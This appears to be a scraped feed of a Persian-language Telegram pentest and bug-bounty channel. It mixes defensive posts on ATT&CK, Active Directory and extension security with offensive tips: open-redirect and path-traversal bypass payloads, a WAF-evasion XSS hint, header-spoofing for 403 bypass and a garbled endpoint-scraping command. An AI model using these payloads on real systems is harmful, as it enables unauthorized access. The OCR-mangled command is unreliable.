WBP-PVD THB Team.pdf
2.2 MB
🔖 پنتست به روش «جعبهسفید»: دیباگ آسیب پذیری های Python
عمیقاً واردِ کشف آسیبپذیری ها در اپلیکیشن های وب نوشتهشده به Python شوید و یاد بگیرید چگونه در VS Code دیباگ کنید تا پیلود را در سراسر فرایند دنبال کنید.
⭕ محتوای راهنما:
✅ نصب منابع لازم: VS Code، Python Debugger، Docker
✅ ساختار فایل
✅ کشف آسیب پذیری های Python
✅ آسیب پذیری های رایج در Python
✅ نکات برای بهبود تست به روش «جعبهسیاه» با استفاده از تحلیل کد
@TryHackBox | Github | YouTube | Group
#pentest #tools #python
عمیقاً واردِ کشف آسیبپذیری ها در اپلیکیشن های وب نوشتهشده به Python شوید و یاد بگیرید چگونه در VS Code دیباگ کنید تا پیلود را در سراسر فرایند دنبال کنید.
⭕ محتوای راهنما:
✅ نصب منابع لازم: VS Code، Python Debugger، Docker
✅ ساختار فایل
✅ کشف آسیب پذیری های Python
✅ آسیب پذیری های رایج در Python
✅ نکات برای بهبود تست به روش «جعبهسیاه» با استفاده از تحلیل کد
@TryHackBox | Github | YouTube | Group
#pentest #tools #python
👍4❤1
هفتم آبانماه، «روز کوروش بزرگ» بر همه ایرانیان و ایرانیتباران فرخنده و همایون باد.
کوروش بزرگ نماد همبستگی اقوام ایرانی و عامل پیوند فرهنگی تاریخی ایرانزمین است.
کوروش بزرگ پیام آور صلح و دوستی، احترام به اقوام، دین و مذهب و فرهنگ و زبان مردم شاهنشاهی بزرگ ایران دوره هخامنشی و پدید آورنده نخستین منشور حقوق بشر جهانی است.
ای انسان هر که باشی واز هر جا که بیایی
میدانم خواهی آمد
من کوروشم که برای پارسی ها این دولت وسیع را بنا نهادم
بدین مشتی خاک که تن مرا پوشانده رشک مبر
متن آرامگاه کوروش بزرگ
@TryHackBox
کوروش بزرگ نماد همبستگی اقوام ایرانی و عامل پیوند فرهنگی تاریخی ایرانزمین است.
کوروش بزرگ پیام آور صلح و دوستی، احترام به اقوام، دین و مذهب و فرهنگ و زبان مردم شاهنشاهی بزرگ ایران دوره هخامنشی و پدید آورنده نخستین منشور حقوق بشر جهانی است.
ای انسان هر که باشی واز هر جا که بیایی
میدانم خواهی آمد
من کوروشم که برای پارسی ها این دولت وسیع را بنا نهادم
بدین مشتی خاک که تن مرا پوشانده رشک مبر
متن آرامگاه کوروش بزرگ
@TryHackBox
❤15👎2
ماتریس تاکتیکهای MITRE ATT&CK
مراحل مختلف یک حمله سایبری (چرخه kill chain) را بر اساس مدل MITRE ATT&CK نشان میدهیم. هر بخش یک "تکنیک " است که مهاجمان برای نفوذ و موفقیت در حمله خود به کار میبرند.
✍️نویسنده
@TryHackBox | The Chaos
#MITRE #Kill_Chain #Hacking #CyberSecurity
مراحل مختلف یک حمله سایبری (چرخه kill chain) را بر اساس مدل MITRE ATT&CK نشان میدهیم. هر بخش یک "تکنیک " است که مهاجمان برای نفوذ و موفقیت در حمله خود به کار میبرند.
✍️نویسنده
@TryHackBox | The Chaos
#MITRE #Kill_Chain #Hacking #CyberSecurity
🔥7👍2
🗺 حمله سایبری یک فرآیند مرحلهبهمرحله است. مهاجم از جمعآوری اطلاعات شروع میکند، Tools میسازد، نفوذ میکند، در سیستم پنهان میشود، حرکت میکند، دادهها را میدزدد و در نهایت آنها را خارج میکند.
📚مهمترین نکته برای شما به عنوان مدافع برای هر مرحله از این چرخه، یک اقدام دفاعی مشخص وجود دارد. شما با درک این مراحل میتوانید:
--> از ورود مهاجم جلوگیری کنید (مثلاً با فیلتر ایمیل و وصله کردن سیستم).
--> حرکت او را در شبکه محدود کنید (با تقسیمبندی شبکه).
--> دسترسی او را بگیرید (با سیاست کمترین دسترسی).
--> دادههای خود را ایمن نگه دارید (با پشتیبانگیری).
--> و در نهایت، اگر حملهای رخ داد، به سرعت آن را شناسایی و پاسخ دهید (Incident response).
این نما به شما کمک میکند تا امنیت خود را به صورت لایهای و مرحلهای تقویت کنید.
✍️نویسنده
@TryHackBox | The Chaos
#MITRE #Kill_Chain #Hacking #CyberSecurity
📚مهمترین نکته برای شما به عنوان مدافع برای هر مرحله از این چرخه، یک اقدام دفاعی مشخص وجود دارد. شما با درک این مراحل میتوانید:
--> از ورود مهاجم جلوگیری کنید (مثلاً با فیلتر ایمیل و وصله کردن سیستم).
--> حرکت او را در شبکه محدود کنید (با تقسیمبندی شبکه).
--> دسترسی او را بگیرید (با سیاست کمترین دسترسی).
--> دادههای خود را ایمن نگه دارید (با پشتیبانگیری).
--> و در نهایت، اگر حملهای رخ داد، به سرعت آن را شناسایی و پاسخ دهید (Incident response).
این نما به شما کمک میکند تا امنیت خود را به صورت لایهای و مرحلهای تقویت کنید.
✍️نویسنده
@TryHackBox | The Chaos
#MITRE #Kill_Chain #Hacking #CyberSecurity
❤12
تمام اندپوینت ها را از یک فایل JS استخراج کنید و باگ خود را بگیرید .
- متد اول
waybackurls HOSTS | tac | sed "s#\\\\/\/#\\/\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '\/'
'{if(length($2))print "https:\/\/"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s\/[;}\)>]\/\n\/g\" | grep -Po \" (L'1|\"](https?: )?[\/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['\"](https?:)?[\/1{1,2}[^' \"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
- متد دوم
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\\/[a-zA-Z0-9?&=\\/\-#.](?= (\"||'|'))" | sort -u | tee JS.txt
@TryHackBox
#باگ_بانتی
#infosec #cybersec #bugbountytips
- متد اول
waybackurls HOSTS | tac | sed "s#\\\\/\/#\\/\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '\/'
'{if(length($2))print "https:\/\/"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s\/[;}\)>]\/\n\/g\" | grep -Po \" (L'1|\"](https?: )?[\/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
- متد دوم
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\\/[a-zA-Z0-9?&=\\/\-#.](?= (\"||'|'))" | sort -u | tee JS.txt
@TryHackBox
#باگ_بانتی
#infosec #cybersec #bugbountytips
🔥7❤4👍1
🔖 لیستی از مطالعه باگ بانتی : مجموعه ای منتخب از مقالات و منابع برای شکارچیان باگ بانتی .
https://bb.vitorfalcao.com/
@TryHackBox
#bugbounty #باگ_بانتی
https://bb.vitorfalcao.com/
@TryHackBox
#bugbounty #باگ_بانتی
❤13
This media is not supported in your browser
VIEW IN TELEGRAM
نکته #باگ_بانتی استخراج URLهای فایل های جاوااسکریپت از هر صفحه!
فراموش کن DevTools رو باز کنی از این بوکمارکت استفاده کن تا فوری همه URLهای فایل.js رو استخراج کنی و تو یه فایل.txt دانلودشون کنی.
چرا مهمه:
سریع همه فایلهای جاوااسکریپت لینک شده رو جمع کن
ازشون برای تحلیل استاتیک(LinkFinder، SecretFinder و غیره)استفاده کن
عالی برای recon،کشف endpoint و دور زدن احراز هویت
کد بوک مارکت:
چطور استفاده کن:
یه بوکمارکت جدید تو مرورگرت بساز.
کد بالا رو تو فیلد URL بچسبون.
به سایت هدف برو و بوکمارکت رو کلیک کن.
فایل javanoscript_urls.txt با همه لینکهای.js دانلود میشه.
حالا میتونی اینو به:
LinkFinder
SecretFinder
JSParser
یا تحلیل دستی بدی!
@TryHackBox
فراموش کن DevTools رو باز کنی از این بوکمارکت استفاده کن تا فوری همه URLهای فایل.js رو استخراج کنی و تو یه فایل.txt دانلودشون کنی.
چرا مهمه:
سریع همه فایلهای جاوااسکریپت لینک شده رو جمع کن
ازشون برای تحلیل استاتیک(LinkFinder، SecretFinder و غیره)استفاده کن
عالی برای recon،کشف endpoint و دور زدن احراز هویت
کد بوک مارکت:
javanoscript:(function(){let urls=[];document.querySelectorAll('*').forEach(e=>{urls.push(e.src,e.href,e.url)});urls=[...new Set(urls)].filter(u=>u&&u.endsWith('.js')).join('\n');let blob=new Blob([urls],{type:'text/plain'});let a=document.createElement('a');a.href=URL.createObjectURL(blob);a.download='javanoscript_urls.txt';a.click();})();چطور استفاده کن:
یه بوکمارکت جدید تو مرورگرت بساز.
کد بالا رو تو فیلد URL بچسبون.
به سایت هدف برو و بوکمارکت رو کلیک کن.
فایل javanoscript_urls.txt با همه لینکهای.js دانلود میشه.
حالا میتونی اینو به:
LinkFinder
SecretFinder
JSParser
یا تحلیل دستی بدی!
@TryHackBox
❤18👍2🔥2
🔖 میتونی این Bypass دستی مؤثر برای open redirect رو امتحان کنی
💢 ۱. تزریق Null-byte:
⦁ /google.com%00/
⦁ //google.com%00
💢 ۲. تغییرات(variations) انکودینگ Base64:
⦁ aHR0cDovL2dvb2dsZS5jb20=
⦁ aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
⦁ //base64:d3d3Lmdvb2dsZS5jb20=/
💢 ۳. تغییرات حساس به حروف کوچک/بزرگ:
⦁ //GOOGLE.com/
⦁ //GoOgLe.com/
💢 ۴. توالی های UTF-8 طولانی:
⦁ %C0%AE%C0%AE%2F (انکودینگ طولانی برای../)
⦁ %C0%AF%C0%AF%2F%2Fgoogle.com
💢 ۵. طرح های انکودینگ مخلوط:
⦁ /%68%74%74%70://google.com
⦁ //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
⦁ //base64:%2F%2Fgoogle.com/
💢 ۶. نوتاسیون های(notations) جایگزین دامنه:
⦁ //google.com@127.0.0.1/
⦁ //127.0.0.1.xip.io/
⦁ //0x7F000001/ (IP هگزادسیمال)
💢 ۷. کاراکترهای خاص Trailing:
⦁ //google.com/#/
⦁ //google.com/;&/
⦁ //google.com/?id=123&//
💢 ۸. فرمت آدرس IP اکتال( Octal ):
⦁ http://0177.0.0.1/
⦁ http://00177.0000.0000.0001/
💢 ۹. تغییرات آدرس IP:
⦁ http://3232235777 (نوتاسیون دسیمال IP)
⦁ http://0xC0A80001 (نوتاسیون هگز IP)
⦁ http://192.168.1.1/
💢 ۱۰. Path traversal با انکودینگ:
⦁ /..%252f..%252f..%252fetc/passwd
⦁ /%252e%252e/%252e%252e/%252e%252e/etc/passwd
⦁ /..%5c..%5c..%5cwindows/system32/cmd.exe
💢 ۱۱. گنجاندن پروتکل inclusion:
⦁ ftp://google.com/
⦁ javanoscript:alert(1)//google.com
💢 ۱۲. URLهای نسبی پروتکل:
-:////google.com/
-:///google.com/
💢 ۱۳. موارد لبه redirect:
⦁ //google.com/?q=//bing.com/
⦁ //google.com?q=https://another-site.com/
💢 ۱۴. نوتاسیون IPv6:
⦁ http://[::1]/
⦁ http://[::ffff:192.168.1.1]/
💢 ۱۵. انکودینگ دوگانه URL:
⦁ %252f%252fgoogle.com (دو بار انکود شده)
⦁ %255cgoogle.com
💢 ۱۶. ترکیب traversal و انکودینگ:
⦁ /%2E%2E/%2E%2E/etc/passwd
⦁ /%2e%2e%5c%2e%2e/etc/passwd
💢 ۱۷. مبتنی بر Reverse DNS:
⦁ https://google.com.reverselookup.com
⦁ //lookup-reversed.google.com/
💢 ۱۸. پورت های غیراستاندارد:
⦁ http://google.com:81/
⦁ https://google.com:444/
💢 ۱۹. پنهان سازی یونیکد در مسیرها:
⦁ /%E2%80%8Egoogle.com/
⦁ /%C2%A0google.com/
💢 ۲۰. پنهان سازی پارامترهای کوئری:
⦁ //google.com/?q=http://another-site.com/
⦁ //google.com/?redirect=https://google.com/
💢 ۲۱. استفاده از سمبل @ برای userinfo:
⦁ https://admin:password@google.com/
⦁ http://@google.com
💢 ۲۲. ترکیب userinfo و traversal:
⦁ https://admin:password@google.com/../../etc/passwd
@TryHackBox
#بایپس
💢 ۱. تزریق Null-byte:
⦁ /google.com%00/
⦁ //google.com%00
💢 ۲. تغییرات(variations) انکودینگ Base64:
⦁ aHR0cDovL2dvb2dsZS5jb20=
⦁ aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
⦁ //base64:d3d3Lmdvb2dsZS5jb20=/
💢 ۳. تغییرات حساس به حروف کوچک/بزرگ:
⦁ //GOOGLE.com/
⦁ //GoOgLe.com/
💢 ۴. توالی های UTF-8 طولانی:
⦁ %C0%AE%C0%AE%2F (انکودینگ طولانی برای../)
⦁ %C0%AF%C0%AF%2F%2Fgoogle.com
💢 ۵. طرح های انکودینگ مخلوط:
⦁ /%68%74%74%70://google.com
⦁ //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
⦁ //base64:%2F%2Fgoogle.com/
💢 ۶. نوتاسیون های(notations) جایگزین دامنه:
⦁ //google.com@127.0.0.1/
⦁ //127.0.0.1.xip.io/
⦁ //0x7F000001/ (IP هگزادسیمال)
💢 ۷. کاراکترهای خاص Trailing:
⦁ //google.com/#/
⦁ //google.com/;&/
⦁ //google.com/?id=123&//
💢 ۸. فرمت آدرس IP اکتال( Octal ):
⦁ http://0177.0.0.1/
⦁ http://00177.0000.0000.0001/
💢 ۹. تغییرات آدرس IP:
⦁ http://3232235777 (نوتاسیون دسیمال IP)
⦁ http://0xC0A80001 (نوتاسیون هگز IP)
⦁ http://192.168.1.1/
💢 ۱۰. Path traversal با انکودینگ:
⦁ /..%252f..%252f..%252fetc/passwd
⦁ /%252e%252e/%252e%252e/%252e%252e/etc/passwd
⦁ /..%5c..%5c..%5cwindows/system32/cmd.exe
💢 ۱۱. گنجاندن پروتکل inclusion:
⦁ ftp://google.com/
⦁ javanoscript:alert(1)//google.com
💢 ۱۲. URLهای نسبی پروتکل:
-:////google.com/
-:///google.com/
💢 ۱۳. موارد لبه redirect:
⦁ //google.com/?q=//bing.com/
⦁ //google.com?q=https://another-site.com/
💢 ۱۴. نوتاسیون IPv6:
⦁ http://[::1]/
⦁ http://[::ffff:192.168.1.1]/
💢 ۱۵. انکودینگ دوگانه URL:
⦁ %252f%252fgoogle.com (دو بار انکود شده)
⦁ %255cgoogle.com
💢 ۱۶. ترکیب traversal و انکودینگ:
⦁ /%2E%2E/%2E%2E/etc/passwd
⦁ /%2e%2e%5c%2e%2e/etc/passwd
💢 ۱۷. مبتنی بر Reverse DNS:
⦁ https://google.com.reverselookup.com
⦁ //lookup-reversed.google.com/
💢 ۱۸. پورت های غیراستاندارد:
⦁ http://google.com:81/
⦁ https://google.com:444/
💢 ۱۹. پنهان سازی یونیکد در مسیرها:
⦁ /%E2%80%8Egoogle.com/
⦁ /%C2%A0google.com/
💢 ۲۰. پنهان سازی پارامترهای کوئری:
⦁ //google.com/?q=http://another-site.com/
⦁ //google.com/?redirect=https://google.com/
💢 ۲۱. استفاده از سمبل @ برای userinfo:
⦁ https://admin:password@google.com/
⦁ http://@google.com
💢 ۲۲. ترکیب userinfo و traversal:
⦁ https://admin:password@google.com/../../etc/passwd
@TryHackBox
#بایپس
Another Site
Home - Another Site
Embrace Life’s Journey with Us About Read About Travel Embark on a journey of discovery with our travel content, where every destination is a story waiting to be told. From the sun-kissed shores of exotic beaches to the charming cobblestone streets of historic…
👍12
🔖 لیست تکنیک های شناسایی (recon) که تقریباً هیچ کسی امتحان نمیکنه
• اجرای CeWL روی product & API docs
• شمارش VHost و Bruteforcing با هدر هاست تنظیم شده روی "localhost"
• بروت فورس با متدهای HTTP مختلف (POST, PUT, PATCH, ...)
• شناسایی از روی Favicon
• کراولینگ سایت ها با هدرهای user-agent مختلف
@TryHackBox
#باگ_بانتی #شناسایی
• اجرای CeWL روی product & API docs
• شمارش VHost و Bruteforcing با هدر هاست تنظیم شده روی "localhost"
• بروت فورس با متدهای HTTP مختلف (POST, PUT, PATCH, ...)
• شناسایی از روی Favicon
• کراولینگ سایت ها با هدرهای user-agent مختلف
@TryHackBox
#باگ_بانتی #شناسایی
👍10❤2
🟥 بسیاری از نفوذهای موفق به شبکههای ویندوزی، نه به دلیل باگهای نرمافزاری، بلکه به دلیل پیکربندیهای ضعیف و اشتباه در سرویس Active Directory رخ میدهند.
🟦کلید اصلی امنیت، غیرفعال کردن پروتکلهای قدیمی و ناامن
(مانند NTLM و LLMNR)
🟩اعمال اصل "کمترین دسترسی" یا همان "Least Privilege" در سخت افزار ها و انجام ممیزی و بازبینی منظم تنظیمات و مجوزها است.
✍️نویسنده
@TryHackBox | The Chaos
#Active_Directory #AD #Windows #CyberSecurity
🟦کلید اصلی امنیت، غیرفعال کردن پروتکلهای قدیمی و ناامن
(مانند NTLM و LLMNR)
🟩اعمال اصل "کمترین دسترسی" یا همان "Least Privilege" در سخت افزار ها و انجام ممیزی و بازبینی منظم تنظیمات و مجوزها است.
✍️نویسنده
@TryHackBox | The Chaos
#Active_Directory #AD #Windows #CyberSecurity
❤8👍2
سلب مسئولیت TryHackBox.pdf
679.7 KB
💢 این سلب مسئولیت شامل تمام آموزش ها، راهنماها و به طور کلی تمام محتوای منتشر شده توسط نویسنده ها در این کانال می شود.
این کانال فقط برای اهداف آموزشی و پیشگیرانه است و در هیچ شرایطی به تشویق به نقض قوانین نمی پردازد. به درخواستهایی که قوانین ایران را نقض میکنند پاسخی داده نخواهد شد. علاوه بر این، شما به تنهایی مسئول اقدامات و استفادههای خود از مطالب ارائه شده در این کانال خواهید بود. نه نویسنده و نه میزبان او نمی توانند مسئول اقدامات شما، هر نوع که باشد، باشند.
@TryHackBox
#سلب_مسئولیت
این کانال فقط برای اهداف آموزشی و پیشگیرانه است و در هیچ شرایطی به تشویق به نقض قوانین نمی پردازد. به درخواستهایی که قوانین ایران را نقض میکنند پاسخی داده نخواهد شد. علاوه بر این، شما به تنهایی مسئول اقدامات و استفادههای خود از مطالب ارائه شده در این کانال خواهید بود. نه نویسنده و نه میزبان او نمی توانند مسئول اقدامات شما، هر نوع که باشد، باشند.
@TryHackBox
#سلب_مسئولیت
❤11👍3🕊1
🔖 در تلاش برای بایپس WAF و تزریق پیلود XSS، تگ <details> را فراموش نکنید. اغلب توسط WAF مسدود نمیشود!
@TryHackBox
#باگ_بانتی #نکته
@TryHackBox
#باگ_بانتی #نکته
👍14❤2👎1
🔖 از این هدرهای درخواست برای عبور از خطای 403 Forbidden استفاده کنید
@TryHackBox
#باگ_بانتی #نکته
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1 X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1
@TryHackBox
#باگ_بانتی #نکته
👍13🔥5
نقشه ذهنی (MindMap) آرتیفکت های DFIR #ویندوز مجموعه ای از آرتیفکتها که در هنگام اجرای عملیات دیجیتال فارنزیک و پاسخ به رویدادهای امنیتی (DFIR) در سیستم های ویندوز، باید مورد توجه قرار گیرند.
@TryHackBox
#پاسخ_به_حادثه #dfir
@TryHackBox
#پاسخ_به_حادثه #dfir
👍5
فزونههای مرورگر میتوانند نقطه ضعف امنیتی بزرگی باشند و توسعهدهندگان باید:
اصل "کمترین دسترسی" را رعایت کنند
از انتقال و ذخیرهسازی ناامن دادهها جلوگیری کنند
در برابر تزریق کد و XSS محافظت کنند
وابستگیهای شخص ثالث امن را مدیریت کنند
شفافیت کامل در مورد جمعآوری داده داشته باشند
این راهنماییها برای توسعهدهندگان افزونه و همچنین کاربرانی که میخواهند افزونههای امنتری انتخاب کنند، بسیار مفید است.
✍️نویسنده
@TryHackBox | The Chaos
اصل "کمترین دسترسی" را رعایت کنند
از انتقال و ذخیرهسازی ناامن دادهها جلوگیری کنند
در برابر تزریق کد و XSS محافظت کنند
وابستگیهای شخص ثالث امن را مدیریت کنند
شفافیت کامل در مورد جمعآوری داده داشته باشند
این راهنماییها برای توسعهدهندگان افزونه و همچنین کاربرانی که میخواهند افزونههای امنتری انتخاب کنند، بسیار مفید است.
✍️نویسنده
@TryHackBox | The Chaos
❤5👏1